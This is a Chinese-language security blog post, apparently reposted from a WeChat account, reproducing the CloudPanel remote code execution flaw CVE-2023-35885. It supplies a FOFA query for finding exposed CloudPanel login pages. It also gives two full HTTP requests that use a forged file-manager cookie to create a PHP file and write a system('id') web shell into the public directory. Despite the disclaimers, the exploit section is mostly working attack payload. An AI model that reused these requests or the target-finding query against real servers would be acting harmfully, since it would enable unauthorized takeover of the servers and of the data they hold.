2024年1月22日14:06:27评论139 views字数 1952阅读6分30秒阅读模式

“人性的背后是白云苍狗,愿你我都是生活的高手。”

免责声明：文章中内容来源于互联网，涉及的所有内容仅供安全研究与教学之用，读者将其信息做其他用途而造成的任何直接或者间接的后果及损失由用户承担全部法律及连带责任。文章作者不承担任何法律及连带责任！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。

0x00.产品介绍

CloudPanel是一个免费的基于PHP的高性能服务器控制面板，具有轻量级组件和现代功能，易于使用，且支持多个PHP版本，提供多语言版本切换。

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x01.漏洞介绍

由于2.3.1之前的CloudPanel具有不安全的文件管理器cookie身份验证，攻击者可以通过接口创建PHP文件来获取服务器权限。

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x02.影响范围

CloudPanel >= v2.0.0 &&<= v2.3.0

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x03.FOFA

title=="CloudPanel | Log In"

0x04.漏洞复现

POST /file-manager/backend/makefile HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Type: application/x-www-form-urlencodedid=/htdocs/app/files/public/&name=test.php

创建对应文件test.php

CloudPanel RCE漏洞复现(CVE-2023-35885)

POST /file-manager/backend/text HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Type: application/x-www-form-urlencodedid=/htdocs/app/files/public/test.php&content=<?php system('id');?>

写入内容

CloudPanel RCE漏洞复现(CVE-2023-35885)

直接访问根路径下的test.php

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x05.修复建议

厂商已提供漏洞修补方案，请关注厂商主页及时更新

https://www.cloudpanel.io/

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

遵守网络安全法，请勿用于非法入侵，仅供学习

原文始发于微信公众号（深白网安）：CloudPanel RCE漏洞复现(CVE-2023-35885)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x00.产品介绍

0x01.漏洞介绍

由于2.3.1之前的CloudPanel具有不安全的文件管理器cookie身份验证，攻击者可以通过接口创建PHP文件来获取服务器权限。

0x02.影响范围

CloudPanel >= v2.0.0 &&<= v2.3.0

0x03.FOFA

0x04.漏洞复现

0x05.修复建议

glibc静态setuid程序dlopen代码执行漏洞 (CVE-2025-4802)

PowerCreator CMS OpenPublicCourse sql注入

CVE-2025-32433 PoC 漏洞利用发布 - Erlang/OTP 中的严重 SSH 漏洞

CraftCMS 存在前台命令执行漏洞 (CVE-2025-32432)

Clash Verge rev 本地提权/远程命令执行漏洞 POC

用友U8Cloud getReportIdsByTaskId方法-多处SQL注入漏洞分析 POC

通达OA远程代码执行漏洞

汉王e脸通智慧园区管理平台SQL注入漏洞

HANDLINK ISS-7000v2 网关 login_handler.cgi 命令注入 POC

Fortinet零日RCE (CVE-2025-32756)深度解析：原理、TTPs及企业级纵深防御策略

发表评论

在线咨询

微信